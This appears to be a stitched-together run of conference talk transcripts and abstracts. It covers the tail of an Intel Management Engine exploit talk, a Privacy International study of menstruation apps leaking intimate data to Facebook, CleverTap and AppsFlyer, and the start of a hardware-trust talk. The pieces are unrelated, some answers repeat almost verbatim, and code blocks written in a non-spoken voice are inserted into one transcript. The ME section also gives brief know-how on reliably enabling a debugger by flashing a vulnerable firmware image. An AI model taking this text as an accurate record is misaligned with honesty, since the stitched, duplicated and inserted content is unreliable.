Right. I was going to ask whether there were any questions, but I don't think there's really any time for that anymore. Peter, thank you so much. Unfortunately, we don't have any more time left. I'll be around. I think it's very, very interesting, and I hope that your talk will inspire many people to keep looking into how the Management Engine works and hopefully uncover even more stuff. I think we have time for just one single question. Do we have one from the internet? Thank you so much. Okay. First off, I have to tell you your shirt is nice; the chat wanted me to say this. And they asked how reliable this exploit is and whether it works on every boot. Right, yeah, that's actually something really important that I forgot to mention. They patched the vulnerability, but they didn't provide downgrade protection. If you can flash a vulnerable image with an exploit in it, it'll just boot every time on these chipsets. So on sixth and seventh generation chipsets, put in that image and it will reliably turn on the debugger every time you turn on the computer. Thank you so much for the question, and Peter, thank you so much. Please give him a great round of applause.
Reverse engineering a system on a chip from sparse documentation and binaries, developing an emulator from it, and gathering the knowledge needed to develop a replacement for one of the more controversial binary blobs in the modern PC. The Intel Management Engine, a secondary computer system embedded in modern chipsets, has long been considered a security risk because of its black-box nature and high privileges within the system. The last few years have seen increasing amounts of research into the ME, and several vulnerabilities have been found. Although limited details were published about these vulnerabilities, reproducing exploits has been hard because of the limited information available on the platform. The ME firmware is the root of trust for the fTPM, Intel Boot Guard and several other platform security features; controlling it allows overriding manufacturer firmware signing and allows implementing many background management features. I have spent most of the past year reverse engineering the OS, the hardware and the links to the host (main CPU) system. This research has led me to create custom tools for manipulating firmware images, to write an emulator for running ME firmware modules under controlled circumstances, and has allowed me to replicate an unpublished exploit to gain code execution. In this talk I will share the knowledge I have gathered so far, document my methods and also explain how to go about a similar project. I also plan to discuss the possibility of an open source replacement firmware for the Management Engine. The information in this talk covers ME version 11.x, which is found in 6th and 7th generation chipsets (Skylake/Kabylake era); most of the hardware-related information is also relevant for newer chipsets.
10.5446/53181 (DOI)
So, it is my honor to introduce you today to Eva and Chris. Eva is a senior researcher at Privacy International. She works on gender, economic and social rights, and how they interplay with the right to privacy, especially in marginalized communities. Chris is the technology lead at Privacy International, and his day-to-day job is to expose companies and how they profit from individuals. And specifically today, they will tell us how these companies can even profit from your menstruation. Thank you. Thank you. Hi, everyone. It is nice to be back at CCC. This talk is going to be a sort of vague part two; if you weren't at part one, I will give you a very brief recap, because there is a relationship between the two. So, yeah, I'll give a little bit of background about how this project started. Then we are going to talk a little bit about menstruation apps and what a menstruation app actually is. Then we are going to talk through some of the data that these apps are collecting. We are going to talk through how we did our research, our research methodology, and then what our findings and conclusions are. So, last year, a colleague and I did a project around how Facebook collects data about users on Android devices using the Facebook SDK for Android, and this is whether you have a Facebook account or not. For that project, we really looked at what happens when you first open apps, without doing much interaction with them, particularly the automatic sending of data in a post-GDPR context. We looked at a load of apps for that project, across disparate categories, including a couple of period trackers. That kind of led on to this project: we thought we would hone in a little bit on period trackers to see what kind of data they share, because they are far more sensitive than many of the other apps on there, even if you might consider your music history to be very sensitive. Just as a quick update on the previous work from last year: we actually followed up with all of the companies from that report, and by the end of going through multiple rounds of responses, over 60% of them had changed practices, either by disabling the Facebook SDK in their app, or disabling it until you gave consent, or removing it entirely. So, I'm going to pass over to Eva Blum-Dumontet; she's going to talk through the menstruation apps. I just want to make sure we're all on the same page, although if you didn't know what menstruation apps are and you still bothered coming to this talk, I'm extremely grateful. How many of you are using a menstruation app or have a partner who's been using a menstruation app? Oh, my God. I didn't expect that; I thought it was going to be much less. In case you don't know what a menstruation app is: the idea of a menstruation app, we also call them period trackers, is to have an app that tracks your menstruation cycle. They tell you what days you are most fertile, so you can obviously use them if you're trying to get pregnant, or, if you have for example painful periods, you can plan accordingly. So those are essentially the two main reasons users would be looking into using a menstruation app: pregnancy and period tracking. Now, how did this research start? As Chris said, there was this whole research that had been done by Privacy International last year on various apps.
As Chris also already said, what I was particularly interested in was the kind of data that menstruation apps are collecting, and as we'll explain in this talk, it's really not just limited to your menstruation cycle. So I was interested in seeing what actually happens to the data and how it is being shared. I should say we're really standing on the shoulders of giants when it comes to this research. There was previously existing research on menstruation apps done by a partner organization, Coding Rights, in Brazil. They had done research on the kind of data that was collected by menstruation apps and the granularity of this data, and another very interesting thing they were looking at was the gender normativity of those apps. Chris and I have been looking at dozens of those apps, and they have various data sharing practices, as we'll explain in this talk, but one thing that all of them have in common is that they are all pink. The other thing is that they talk to their users as women; they don't even compute the fact that maybe not all their users are women. So there is a very narrow perspective on pregnancy, on female bodies and on how female sexuality functions. Now, as I was saying, when you're using a menstruation app, it's not just your menstruation cycle that you're entering. These are some of the questions that menstruation apps ask. Sex: there's a lot about sex that they want to know, how often, is it protected or unprotected. Are you smoking, are you drinking, are you partying, how often? We even had one app that was asking about masturbation, your sleeping patterns, your coffee drinking habits. One thing that's really interesting, and we'll talk a little bit more about this later, is that there are very strong data protection laws in Europe, the GDPR, as most of you will know, and they say that only data that's really necessary should be collected. So I'm still unclear what masturbation has to do with tracking your menstruation cycle. The other thing that was collected is about your health, and the reason health is so important is also related to data protection law, because when you're collecting health data you need to show that you're taking extra steps, as it's considered sensitive personal data: extra steps in terms of getting explicit consent from the users, but also extra steps on behalf of the data controller in terms of showing what they're doing for the security of this data. So this is the type of question that was asked. There's so much asked about vaginal discharge, and the kinds of vaginal discharge again had all sorts of weird adjectives: sticky, creamy. So yeah, they clearly thought a lot about this. And there's a lot about mood as well. I didn't know romantic was a mood, but apparently it is. And what's interesting about mood, obviously, in a context where we've seen stories like Cambridge Analytica, is that we know how much companies and political parties are trying to understand how we think and how we feel. So it's actually quite significant that you have an app that's collecting information about how we feel on a daily basis. And obviously, when people enter all this data, their expectation at that point is that the data stays between them and the app, and there is actually very little in the privacy policies that would suggest otherwise. So this is the moment where I should say: we're not making this up.
Literally everything in this list of questions is something they asked, in those literal terms. So we set out to look at the most popular menstruation apps. Do you want to take over? Yeah, I forgot to introduce myself as well, which is a terrible speaking habit: Christopher Weatherhead, Privacy International's technology lead. So yeah, as I said about my previous research, we have actually looked at most of the very popular menstruation apps, the ones that have hundreds of thousands of downloads. This kind of work has been done before, and a lot of these apps have come in for quite a lot of criticism; I'll spare you the free advertising about which ones particularly. But most of them don't do anything particularly outrageous, at least between the app and the developer's servers. A lot of them don't share with third parties at that stage, so you can't tell, by looking between the app and the server, whether they're sharing. They might be sharing data from the developer's server to Facebook or to other places, but at least you can't see that in between. But we're an international organization and we work around the globe, and most of the apps that get the most downloads are particularly Western, US and European, but they're not necessarily the most popular apps in a lot of contexts like India, the Philippines and Latin America. So we thought we'd have a look at those apps. They're all available in Europe, but they're not necessarily the most popular in Europe. And this is where things start getting interesting. So what exactly did we do? Well, we started off by triaging a large number of period trackers, and as Eva said earlier, every logo must be pink. We were just looking through to see how many trackers each one had. This is using Exodus Privacy; we have our own instance at PI. We just looked through to see how many trackers there were and who the trackers were. So for example, this is Maya, which is exceptionally popular, predominantly in India; it's made by an Indian company, and as you can see, it's got a large number of bundled trackers in it: CleverTap, Facebook, Flurry, Google and InMobi. So we went through this process. This allowed us to cut down, because there are hundreds of period trackers. Not all of them are necessarily bad, but it's nice to try and see which ones have the most trackers, where they are used, and to triage them a little bit. From this, we then ran them through PI's interception environment, which is a VM that I made. I actually made it last year for the talk I gave last year, and I said I'd release it after the talk, and it took me like three months to release it, but it's now available; you can go onto PI's website and download it. It's a man-in-the-middle proxy with a few settings, mainly for looking at iOS and Android apps, to intercept the data they send. So we ran the apps through that, and we got to look at all the data that's being sent to and from both the app developer and third parties. And here's what we found. Out of the six apps we looked at, five shared data with Facebook, and out of those five, three pinged Facebook to let them know when their users downloaded and opened the app. That's already quite significant information, and we'll get to that later. Now, what's actually interesting, and the focus of our report, was the two apps that shared every single piece of information the users entered with Facebook and other third parties.
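For anyone who wants to reproduce the traffic-analysis step: the interception environment is at heart a man-in-the-middle proxy, and a small mitmproxy addon along the following lines is enough to flag which apps talk to Facebook's Graph endpoint or other third parties. The domain list is only an example, and this assumes mitmproxy is what you are running in the environment.

```python
# Minimal mitmproxy addon to flag third-party tracker traffic while you use
# an app through the interception VM. Run with:  mitmdump -s flag_trackers.py
# The domain list is only an example; extend it for whatever you are studying.

from mitmproxy import http

TRACKER_DOMAINS = (
    "graph.facebook.com",
    "wzrkt.com",        # CleverTap
    "appsflyer.com",
)

class FlagTrackers:
    def request(self, flow: http.HTTPFlow) -> None:
        host = flow.request.pretty_host
        if any(host == d or host.endswith("." + d) for d in TRACKER_DOMAINS):
            print(f"[tracker] {host}{flow.request.path[:80]}")

addons = [FlagTrackers()]
```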
So just to brief you, the two apps we focused on are both called Maya, so that's not very helpful. One is spelled Maya, M-A-Y-A; the other one is spelled Mia, M-I-A. So yeah, just bear with me, because this is actually quite confusing. Initially we'll focus on Maya, M-A-Y-A, which, as Chris mentioned, is an app that's based in India. They have a user base of several million, mostly in India, and they're also quite popular in the Philippines. Now, what's interesting with Maya is that it starts sharing data with Facebook before you even get to agree to its privacy policy. I should say, about the privacy policies of a lot of the apps we looked at: they're literally the definition of small print. They're very hard to read, they're in legal language, and it really puts into perspective the whole question of consent in the GDPR, because the GDPR says that consent must be informed, so you must be able to understand what you're consenting to. When you're reading the extremely long, extremely opaque privacy policies of literally every period app we looked at, except one that didn't even bother putting up a privacy policy at all, they're opaque, they're very hard to understand, and they absolutely, definitely do not say that they're sharing information with Facebook. So, as I said, data sharing happens before you get to agree to the privacy policy. The other thing that's worth remembering is that when they share information with Facebook, it doesn't matter whether you have a Facebook account or not; the information is still being relayed. The other interesting thing you'll notice in several of the slides is that the information being shared is tied to your identity through your unique ID identifiers and your email address. Basically, most of the questions we got when we released the research were like, oh, if I use a fake email address or a fake name, is that okay? Well, it's not, because through your unique ID identifiers they would still be able to trace the data back to you, whether you have a Facebook account or not. So there is little way to actually anonymize this process, unless you're deliberately trying to trick it and use a separate phone; for regular users, it's quite difficult. So this is what it looks like when you enter the data; as I said, this is the kind of question they're asking you. And this is what it looks like when it's being shared with Facebook: you see the symptoms changing, for example blood pressure, swelling, acne. This is all being shared with graph.facebook.com through the Facebook SDK. This is what it looks like when they share your contraceptive practice. So again, we're talking health data here, we're talking sensitive data, we're talking about data that should normally require extra steps in terms of how it's collected and how it's processed. But no, in this case it was shared exactly like the rest. This is what it looks like. With sex life, it was a little bit different. This is what it looks like when they ask you: you've just had sex, was it protected, was it unprotected? The way it was shared with Facebook was a little bit more cryptic, so to speak: if you had protected sex, it was entered as "love 2", and unprotected sex was entered as "love 3". I managed to figure that out pretty quickly, so it's not so cryptic. So yeah, that's also quite funny.
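Once you have the intercepted app events, mapping odd custom values like these back to what the user actually entered is just a lookup, as in the small sketch below. The two "love" values are the ones described above; everything else about the event format here is an assumption for illustration.

```python
# Sketch: translating Maya's custom app-event values back into what the user
# entered. The "love 2"/"love 3" mapping is the one described above; the event
# structure itself is a simplified assumption for illustration.

CUSTOM_EVENT_MEANINGS = {
    ("love", "2"): "sex, protected",
    ("love", "3"): "sex, unprotected",
}

def describe_event(name: str, value: str) -> str:
    return CUSTOM_EVENT_MEANINGS.get((name, value), f"{name}={value} (unmapped)")

print(describe_event("love", "3"))   # -> "sex, unprotected"
```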
So Maya had a diary section where they encouraged people to enter their notes and their personal thoughts. It's a menstruation app, so you can sort of get an idea of what people are going to be writing down in there; it's not going to be their shopping list, although shopping lists could also be sensitive personal information. So we were wondering what would happen if we wrote in this diary and how that data would be processed. We literally entered "something very sensitive entered here"; this is what we wrote. And literally everything we wrote was shared with Facebook. Maya also shared your health data not just with Facebook, but with a company called CleverTap that's based in California. What's CleverTap? CleverTap is a data broker, basically. It's a company that works in a way similar to Facebook with the Facebook SDK: they expect app developers to hand over the data, and in exchange app developers get insights about how people use the app, at what time of the day, the age of their users; they get analytics out of the data that they share with this company. It took us some time to figure this out, because the data was shared as "WizRocket", which is CleverTap's former name. But it's exactly the same: everything that was shared with Facebook was also shared with CleverTap, together with the email address that we were using. Now let's look at the other Maya, Mia. It's not just the name that's similar, it's also the data sharing practices. Mia is based in Cyprus, so in the European Union. I should say that in all cases, regardless of where the company is based, the moment they market the product in the European Union, and that's literally every app we looked at, they have to respect the GDPR, the European data protection law. Now, the first thing that Mia asks when you start the app, and again I'll get to the significance of this later, is why you're using the app: are you using it to try and get pregnant, or are you just using it to track your period? That's interesting, because it doesn't change at all the way you interact with the app; the app stays exactly the same. But this is actually the most important kind of data; it's literally the gem of data collection, knowing whether a woman is trying to get pregnant or not. So the reason this is the first question they ask is, my guess is, that they want to make sure that even if you don't actually use the app afterwards, that's at least that much information they can collect about you. And this information was immediately shared with Facebook and with AppsFlyer. AppsFlyer is very similar to CleverTap in the way it works; it's also a company that collects data from those apps and offers services in terms of analytics and insights into user behavior. It's based in Israel. So this is what it looks like when you enter the information: masturbation, pills, what kind of pill you're taking, your lifestyle habits. Now, where it's slightly different is that the information doesn't immediately get shared with Facebook; instead, based on the information you enter, you get articles that are tailored for you. So for example, when you select masturbation, you will get "masturbation: what you want to know but are ashamed to ask". Now, what's eventually shared with Facebook is the kind of article that's being offered to you.
So basically, yeah, the information is shared indirectly, because Facebook can then tell that you've just entered masturbation, since you're getting an article about masturbation. This is what happens when you enter alcohol, "expected effects of alcohol on a woman's body", and this is what happens when you enter unprotected sex. So effectively, all the information is still shared, just indirectly, through the articles you're getting. And one last thing on this, in terms of the articles you're getting: sometimes they were also crossing the data. So an article will be about, for example, cramps outside of your period, during your fertile phase, and you'll get articles specifically for this. So the information that's shared with Facebook and with AppsFlyer is that this person is in the fertile phase of their cycle and having cramps. Now, why are menstruation apps obsessed with finding out whether you're trying to get pregnant? This goes back to a lot of the things I mentioned before about wanting to know, in the very first place, whether you're trying to get pregnant or not, and this is probably why a lot of those apps really try to nail down, in their language and in their discourse, what you're using the app for. When a person is pregnant, their purchasing habits, their consumer habits, change. You're obviously not buying only for yourself, you start buying for others as well, but you're also buying new things you've never purchased before. So where for a regular person it would be quite difficult to change their purchasing habits, advertisers will be really keen to target a person who's pregnant, because this is a point in their life where their habits change and where they can be more easily influenced one way or another. In other words, it's peak advertising time. To put it in figures, there's research done in 2014 in the US that tried to evaluate the value of a person's data: an average American person who's not pregnant was worth 10 cents, and a person who's pregnant was worth $1.50. So, you may have noticed we're using the past tense when we talk about the data sharing of these apps. That's because both Maya and Mia, the two apps we were really targeting in this report, stopped using the Facebook SDK when we wrote to them about our research, before we published it. Which was quite nice, because they didn't even wait for us to actually publish the report; it was merely at the stage of, hey, this is our research, we're going to be publishing this, do you have anything to say about it? And essentially what they had to say was: yep, sorry, apologies, we're stopping this. I think what's really interesting for me about how quick the response was is that it really shows how this is not a vital service for them. It's a plus, a useful tool, but the fact that they immediately just stopped using it really shows that it was, I wouldn't say a lazy practice, but a case of: as long as no one's complaining, they're going to carry on using it. And I think that was also the case with your research; there were also a lot that changed their behavior afterwards.
A lot of the developers sometimes don't even realize what data their app is sharing with the likes of Facebook, or CleverTap, or whoever. They just integrate the SDK and hope for the best. We also got this interesting response from AppsFlyer. It's very hypocritical: essentially what they were saying is, oh, we specifically ask our customers not to share health data with us, precisely for the reason I mentioned earlier, which is that under the GDPR you're normally expected to take extra steps when you process sensitive health data. So their response is that they ask their customers not to share health data or sensitive personal data with them, so that they don't become liable under the law: oh, we're sorry, this is a breach of our contract. The reason it's very hypocritical is that obviously, when you have contracts with menstruation apps, and Maya was not the only menstruation app they were working with, you can generally expect what kind of data you're going to receive. So here's a conclusion for us. This research works, it's fun, and it's easy to do. Chris has now published the environment, and once the environment is set up, it doesn't actually require a technical background; as you saw from the slides, it's pretty straightforward to understand how the data is being shared. So you should do it too. But more broadly, we think it's really important to do more research, not just on this kind of app, but generally on the security and the data sharing practices of apps, because more and more people are interacting with technology and using the internet, so we need to think much more carefully about the security implications of the apps we use. And obviously, it works. Thank you. So, yeah, please line up in front of the microphones. We can start with microphone two. Hi, thank you. So you mentioned that we can now check whether data is being shared with third parties on the path between the user and the developer, but we cannot know, for the other parties, whether it's being shared later, from the company to other companies. Have you conceptualized some ways of testing that? Is it possible? Yeah, so you could do a data subject access request under the GDPR. The problem is it's quite hard to know how the data is processed once it's outside of the app-to-server relationship; it's quite opaque. They might apply a different identifier to it, they might do other manipulation of that data, so trying to track down and prove that a particular bit of data belonged to you is quite challenging. This is something we're going to be doing in 2020, actually. We're going to be doing data subject access requests for the apps we've been looking at, to see if we find anything, both under the GDPR and under different data protection laws in different countries, to see basically what we get and how much we can obtain from that. So I'd go to the Signal Angel. So what advice can you give us on how we can make people understand that, from a privacy perspective, it's not better to use pen and paper instead of entering sensitive data into any of these apps? I definitely wouldn't advise that; I wouldn't advise pen and paper. I think for us, really, the key is that the work we're doing is not actually targeting users. It's targeting companies.
We think it's companies that really need to do better. We're often asked for advice to customers, advice to users and consumers, but what I think, and what we've been telling companies as well, is that their users trust them, and they have the right to trust them. They also have the right to expect that companies respect the law. The European Union has a very ambitious piece of legislation when it comes to privacy, the GDPR, and the least users can expect is that companies respect it. And no, this is the thing: I think people have the right to use those apps, they have the right to say, well, this is a useful service for me. It's really companies that need to up their game, that need to live up to the expectations of their consumers. Hi, so from the talk it seems, and I think that's what you did, that you mostly focused on Android-based apps. Can you maybe comment on what the situation is with iOS? Is there any technical difficulty, or is anything completely different with respect to these apps, and apps in general? There's not really a technical difficulty. The setup's a little bit different, but functionally you can look at the same kind of data. The focus here, though, is twofold in some respects. Most of the places these apps are used are heavily Android-dominated territories, like India and the Philippines, where iOS and Apple device penetration is very low. There's no technical reason not to look at Apple devices, but in this particular context it's not necessarily hugely relevant. Does that answer your question? And technically, with your setup, you could also do the same analysis with an iOS device? Yeah, there's a little bit of a change in how you have to register the device, as an MDM device with a mobile profile, but otherwise you can do exactly the same level of interception. Hi. My question is actually related to the last question; it's a little bit technical. I'm also doing some research on apps, and I've noticed with the newest versions of Android that they're making it more difficult to install custom certificates to have this pass-through and check what the apps are actually communicating to their home servers. Have you found a way to make this easier? Yes, we actually hit the same issue, in some respects. Installing custom certificates was not really an obstacle, because if it's a rooted device you can add them to the system store, and then they are trusted by all the apps on the device. The problem we're now hitting is that Android 9 and 10 have TLS 1.3, and TLS 1.3 detects that there's a man in the middle, or at least it tries to, and might terminate the connection. This is a bit of a problem, so currently all our research is still running on Android 8.1 devices. That isn't going to be sustainable long term, though. Four. Hi, thank you for the great talk. Your research is obviously targeted, in a constructive, critical way, towards companies that are making apps around menstruation. Did you learn anything from this context that you would want to pass on to people who research this area more generally? I'm thinking, for example, of Fatima and Corb in the US, who've done microdosing research on LSD and are starting a breakout study on menstrual issues. I think, and this is why I concluded on this point, that there's still a lot of research that needs to be done on data sharing, and obviously I think anything that touches on people's health is a key priority, because it's something people relate to very strongly. Think of the consequences, especially in the US for example, of sharing health data like this, of having data even like your blood pressure and so on: what are the consequences if that information is shared, for example, with insurance companies? So this is why I think it's absolutely essential to have a better understanding of the data collection and sharing practices of these services the moment health data is involved. Yeah, because we often focus on this being an advertising issue, but in that sense as well, insurance and even credit referencing and all sorts of other things become problematic, especially when it comes to pregnancy-related data. Yeah, even employers could be after this kind of information. Six.
And obviously, I think anything that touches on people's health is a key priority because it's something people relate very strongly to. The consequences, especially in the US, for example, of sharing health data like this, of having data, even like your blood pressure and so on. What are the consequences if those information are going to be shared, for example, with insurance companies and so on? So this is why I think it's absolutely essential to have a better understanding of the data collection and sharing practices of the services the moment when you have health data that's being involved. Yeah, because we often focus about this being an advertising issue, but in that sense as well, like insurance and even credit referencing and all sorts of other things become problematic, especially when it comes to pregnancy related. Yeah, even employers could be after this kind of information. Six. Hi. I'm wondering if there is an easy way or a tool which we can use to detect if apps are using our data or reporting them to Facebook or whatever, or if we can even use those apps but block this data from being reported to Facebook? Yeah, so you can file all of Facebook, graph.facebook.com and stop sending data. But there's a few issues here. So firstly, this audience can do this. Most users don't have the technical nuance to know what needs to be blocked, what doesn't necessarily need to be blocked. It's on the companies to be careful with users' data. It's not up to the users to try and defend against. It shouldn't be on the user to defend against malicious data sharing or data. And also one interesting thing was that Facebook had put this in place of where you could opt out from data sharing with the apps you're using. But that only works if you're a Facebook user. And as I said, this data has been collected whether you're a user or not. So in a sense, for people who are on Facebook users, they couldn't opt out of this. The Facebook SDK that developers are integrating, the default state for sharing of data is on, the flag is true. And although they have a long legal text on the help pages for their developer tools, it's like unless you have a decent understanding of local data protection practice or local protection law, it's not something that most developers are going to be able to understand why this flag should be something different from on, why there's loads of flags in the SDK, which flag should be on and off depending on which jurisdiction you're selling to. Your users are going to be in. Do you know any good apps which don't share data and privacy friendly, probably even one that is open source? So I mean, the problem which is why I wouldn't want to vouch for any app is that even in the apps that, you know, where in terms of like the traffic analysis we've done, we didn't see any data sharing, as Chris was explaining, the data can be shared at a later stage and it'd be impossible for us to really find out. So I know I can't be vouching for any app. The problem is we can't even look at one specific moment in time to see whether data is being shared and what was good today might be bad tomorrow, what was bad yesterday might be good today. So I have been in Argentina recently speaking to a group of feminist activists and they have been developing an administration tracking app and their app was removed from the Google Play Store because it had illustrations that were deemed pornographic, but there were illustrations around medical related stuff. 
So even people who were trying to do the right thing, going through the open source channels, are still fighting a completely different issue when it comes to menstruation tracking. It's a very fine line. Microphone three. So you can't hear? The mic's not working. Microphone three. Yes. Thanks for the great talk. I was wondering if the Graph API endpoint was actually in place to track menstruation data, or is it more like a general purpose advertisement tracking thing? So my understanding is that there's two broad kinds of data that Facebook gets. There's automated app events that Facebook are aware of. So app open, app close, app install, relinking. Relinking is quite an important one for Facebook. It checks to see whether you already have a Facebook account logged in, to link the app to your Facebook account, from my understanding. There's also a load of custom events that the app developers can put in, and that is then collated back into a data set, I would imagine, on the other side. So when it comes to things like whether there's nausea or some of the other health issues, it's actually being cross-referenced by the developer. Does that answer your question? Yes. Microphone five. Can you repeat what you said in the beginning about the menstruation apps used in Europe, especially Clue and Period Tracker? Yeah. So those are the most popular apps actually across the world, not just in Europe and the US. A lot of them, at the traffic analysis stage, have now cleaned up their act. So we can't see any data sharing happening at that stage. But as I said, I can't be vouching for them and saying, oh yeah, those are safe and fine to use, because we don't know what's actually happening to the data once it's been collected by the app. All we can say is that as far as the research we've done goes, we didn't see any data being shared. So those apps you mentioned have been investigated by the Wall Street Journal and the New York Times relatively recently. So they've had quite a spotlight on them. So they've had to really up their game in a lot of ways, which is what we'd like everyone to do. But as Eva says, we don't know what else they might be doing with that data on their side, not necessarily in between the phone and the server, but from their server to another server. Microphone one. Hi. Thank you for the insightful talk. I have a question that goes in a similar direction. Do you know whether or not these apps, even if they adhere to GDPR rules, collect the data to then at a later point sell it to the highest bidder, because a lot of them are free to use? And I wonder, what is their main goal? Possibly. I mean, advertisement is how they make profit. And so, I mean, the whole question about them trying to know if you're pregnant or not is so that this information can eventually be monetized through targeted advertisement. When you're actually using those apps, you can see in some of them that you're constantly being flooded with all sorts of advertisements in the app. Whether they're selling it externally or not, I can't tell. But what I can tell is, yeah, their business model is advertisement, so they are deriving profit from the data they collect. Absolutely. Again, on microphone one. Thank you. I was wondering if there was more of a big data kind of aspect to it as well, because this is really interesting medical information on women's cycles in general. Yeah.
And the answer is, I can't tell; this is a bit of a black box. And especially in the way, for example, that Facebook is using this data, we don't know. We could assume this is part of the profiling that Facebook does of both their users and their non-users. But the way this data is actually processed, also by those apps, through data brokers and so on, it's a bit of a black box. Question one. Yeah. Thank you a lot for your talk. And I have two completely different questions. The first one is, you've been focusing a lot on advertising and how this data is used to sell to advertisers. But I mean, whether you aim to be pregnant or not has to be the best kept secret, at least in Switzerland, for any female person. Because if you also want to get employed, your employer must not know whether or not you want to get pregnant. And so I would like to ask, how likely is it that this kind of data is also potentially sold to employers who might want to poke into your health and reproductive situation? And then my other question is entirely different. Because we also know that female health is one of the least researched topics around, and that's actually a huge problem. So little is actually known about female health, and the kind of data that these apps collect is actually a gold mine to do our own research on health issues that are specific to certain bodies, like female bodies. And so I would also like to know, how would it be possible to still gather this kind of data and still collect it, but use it for a beneficial purpose, like to improve knowledge on these issues? Sure. So, I mean, to answer your first question, the answer will be similar to the previous answer I gave, which is, you know, it's a black box problem. It's very difficult to know exactly what's actually happening to this data. Obviously, GDPR is there to prevent some things from happening. And as we've seen from this app, they were, you know, toeing a very blurry line. And so this is not something I can state as fact. I can't be saying, oh, this is happening, because I have no evidence that this is happening. But obviously, the risks, I must say, are multiple. The risks are employers, as you say, insurance companies that could get it, political parties that could get it and target their messages based on the information they have about your mood, about, you know, even the fact that you're trying to start a family. So yeah, there is a very broad range of risk. The advertisement, we know for sure, is happening, because this is the basis of their business model. But the range of risk is very broad. To just expand on that, again, as Eva said, we can't point out a specific example of any of this. But if you look at some of the other data brokers, so Experian is a data broker, they have a statutory role, in the UK at least, of being a credit reference agency, but they also run what is, I believe, termed data enrichment. And one of the things that employers can do is buy Experian data when hiring staff. I can't say that this data ever ends up there, but there are people collecting data and using it for some level of auditing. And to answer your second question, I think you point out a very important problem, which is the question of data inequality and whose data gets collected for what purpose.
I do quite a lot of work on delivery of state services, for example, and when there are populations that are isolated, that are not using technology and so on, you might just be missing out on people who are in need of healthcare, of state support and so on, just because you lack data about them. And so female health is obviously a very key issue. We literally lack sufficient health data about women, on women's health specifically. Now, in terms of how data is processed in medical research, there are actually protocols in place, normally, to ensure consent, to ensure explicit consent, to ensure that the data is properly collected. And so I wouldn't want to mix the two, just because of the way those apps have been collecting data; if there's one thing to take out of this talk, it's that it's been nothing short of horrifying, really, that data is being collected and shared before you even get to consent to anything. I wouldn't trust any of those private companies to really be the ones carrying out, well, taking part in medical research on this. So I agree with you that there is a need for better and more data on women's health, but I don't think any of those actors so far have proved they can be trusted on this. Microphone two. Yeah, thank you for this great talk. Short question. What do you think is the rationale for these menstruation apps to integrate the Facebook SDK if they don't get money from Facebook and aren't able to commercialize this data? Good question. It could be a mix of things. So sometimes the developers literally just have this as part of their tool chain and their workflow when they're developing apps. I don't necessarily know about these two period trackers, or what other apps are developed by these companies, but in our previous work, which I presented last year, you find that some companies just produce a load of apps and they just use the same tool chain every time, and that includes by default the Facebook SDK as part of their tool chain. And some of them include it for what I would regard as genuine purposes, like they want their users to share something or they want their users to be able to log in with Facebook. In those cases, they include it for what would be regarded as a legitimate reason. But a lot of them don't ever actually use it beyond the app events; they don't really use anything of it other than that. And then a lot of developers seem to be quite unaware that the default state is verbose and of how it sends data to Facebook. Yeah, maybe we can close with one last question from me. You surely tested a bunch of apps; how many of them do certificate pinning? Do you see this as a widespread practice, or not really? Not really. I've yet to have a problem doing the analysis because certificates were pinned. As I say, TLS 1.3 has proven to be more problematic than pinning. Yeah. Okay. Well, thank you so much. And yeah, thank you. All right.
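The traffic analysis setup discussed throughout this Q&A is typically built around an intercepting proxy such as mitmproxy, which is the kind of tooling Privacy International's published testing environment relies on. As a rough, hedged sketch of the graph.facebook.com check mentioned above, the following addon flags, and can optionally drop, requests to a couple of Facebook endpoints; the script name and host list are illustrative choices, not something specified in the talk.

```python
# tracker_watch.py - minimal mitmproxy addon sketch (illustrative, not from the talk).
# Run with:  mitmdump -s tracker_watch.py
from mitmproxy import http

# Endpoints to watch for; graph.facebook.com is the one discussed above.
WATCHED_HOSTS = {"graph.facebook.com", "connect.facebook.net"}

class TrackerWatch:
    def request(self, flow: http.HTTPFlow) -> None:
        host = flow.request.pretty_host
        if host in WATCHED_HOSTS or any(host.endswith("." + h) for h in WATCHED_HOSTS):
            # Log the outgoing request so it shows up alongside the traffic capture.
            print(f"[tracker] {flow.request.method} {flow.request.pretty_url}")
            # Uncomment to drop the request instead of just observing it:
            # flow.kill()

addons = [TrackerWatch()]
```

As the speakers stress, this only shows what a technically inclined user can observe or block on the device; it does nothing about later server-to-server sharing, and the burden should sit with the companies rather than with users.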
In September 2019, Privacy International released exclusive research on the data-sharing practices of menstruation apps. Using traffic analysis, we shed light on the shady practices of companies that shared your most intimate data with Facebook and other third parties. In this talk we will go over the findings of this research, sharing the tools we have used and explaining why this is not just a privacy problem, but also a cybersecurity one. This talk will also be a call to action to app developers whose tools have a concrete impact on the lives of their users. Does anyone – aside from the person you had sex with – know when you last had sex? Would you like them to know if your partner used a condom or not? Would you share the date of your last period with them? Does that person know how you feel on any particular day? Do they know about your medical history? Do they know when you masturbate? Chances are this person does not exist, as there is only so much we want to share, even with our most intimate partner. Yet this is all information that menstruation apps expect their users to fill in. With all this private information you would expect those apps to uphold the highest standards when it comes to handling the data they collect. So, Privacy International set out to look at the most commonly used menstruation apps to find out if that was the case. Using traffic analysis, we wanted to see if those apps were sharing data with third parties, and with Facebook in particular, through the Facebook SDK. Our research shed light on the horrific practices of some menstruation apps that shared their users' most intimate data – about their sexual life, their health and lifestyle – with Facebook and others. In this talk, we will take you through the research we have conducted using Privacy International's publicly available and free testing environment. We will briefly explain how the testing environment works, and we will showcase the menstruation apps with the most problematic practices to show you how very granular and intimate data is shared with third parties, and the security implications of this.
10.5446/53182 (DOI)
Welcome everybody to our very first talk on the first day of Congress. The talk is Open Source is Insufficient to Solve Trust Problems in Hardware. Although there is a lot to be said for free and open software, it is unfortunately not always inherently more secure than proprietary or closed software. The same goes for hardware as well. This talk will take us into the nitty gritty bits of how to build trustable hardware and how it has to be implemented and brought together with the software in order to be secure. We have one speaker here today. It's bunnie. He is a hardware and firmware hacker. But actually the talk was worked on by three people, so it's not just bunnie but also Sean 'xobs' Cross and Tom Marble. The other two are not present today. But I would like you to welcome our speaker bunnie with a big warm round of applause and have a lot of fun. Good morning everybody. Thanks for braving the crowds and making it into the Congress. And thank you again to the Congress for giving me the privilege to address the Congress again this year. Very exciting being the first talk of the day. I had some problems up front, so I'm running from a PDF backup. So we'll see how this all goes. Good thing I make backups. So the topic of today's talk is that open source is insufficient to solve trust problems in hardware, and sort of some things we can do about this. So my background is I'm a big proponent of open source hardware. I love it. And I've built a lot of things in open source using open source hardware principles. But there's been sort of a nagging question to me, because some people would say things like, oh well, you know, you build open source hardware because you can trust it more. And there's been sort of this gap in my head, and this talk tries to distill out that gap in my head between trust and open source and hardware. So I'm sure people have opinions 